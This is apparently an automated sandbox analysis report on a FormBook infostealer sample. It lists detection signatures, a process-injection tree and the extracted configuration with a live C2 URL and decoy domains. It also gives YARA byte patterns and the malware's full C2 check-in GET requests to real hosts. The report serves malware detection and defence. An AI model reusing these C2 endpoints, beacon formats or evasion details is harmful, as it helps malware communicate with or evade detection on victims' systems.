Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report g1EhgmCqCD.exe

Overview

General Information

Sample Name:g1EhgmCqCD.exe
Analysis ID:404135
MD5:5551346aa9f251895021b95a2a7cc390
SHA1:acbcecf7599d3c33f6f2a36c0947cfc633d0a406
SHA256:9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • g1EhgmCqCD.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
    • g1EhgmCqCD.exe (PID: 1748 cmdline: C:\Users\user\Desktop\g1EhgmCqCD.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7028 cmdline: /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.g1EhgmCqCD.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.g1EhgmCqCD.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.g1EhgmCqCD.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        3.2.g1EhgmCqCD.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.g1EhgmCqCD.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: g1EhgmCqCD.exeVirustotal: Detection: 19%Perma Link
          Source: g1EhgmCqCD.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: g1EhgmCqCD.exeJoe Sandbox ML: detected
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: g1EhgmCqCD.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: g1EhgmCqCD.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: g1EhgmCqCD.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cats16.com/8u3b/
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.kayandbernard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.palomachurch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.gb-contracting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.effectivemarketinginc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.timbraunmusician.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.anygivenrunday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.2000deal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.kayandbernard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.palomachurch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.gb-contracting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.effectivemarketinginc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.timbraunmusician.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.anygivenrunday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.2000deal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.kayandbernard.com
          Source: g1EhgmCqCD.exe, 00000001.00000003.651135793.0000000005B80000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.667858038.00000000029F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000002.911535792.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$d
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comI
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comfr
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comnic
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comu
          Source: g1EhgmCqCD.exeString found in binary or memory: http://www.churchsw.org/church-projector-project
          Source: g1EhgmCqCD.exeString found in binary or memory: http://www.churchsw.org/repository/Bibles/
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: g1EhgmCqCD.exe, 00000001.00000003.653172373.0000000005B7E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html3
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiona
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: g1EhgmCqCD.exe, 00000001.00000003.649504763.0000000005B98000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/8
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn6
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnH
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnKr4
          Source: g1EhgmCqCD.exe, 00000001.00000003.649286426.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krn
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
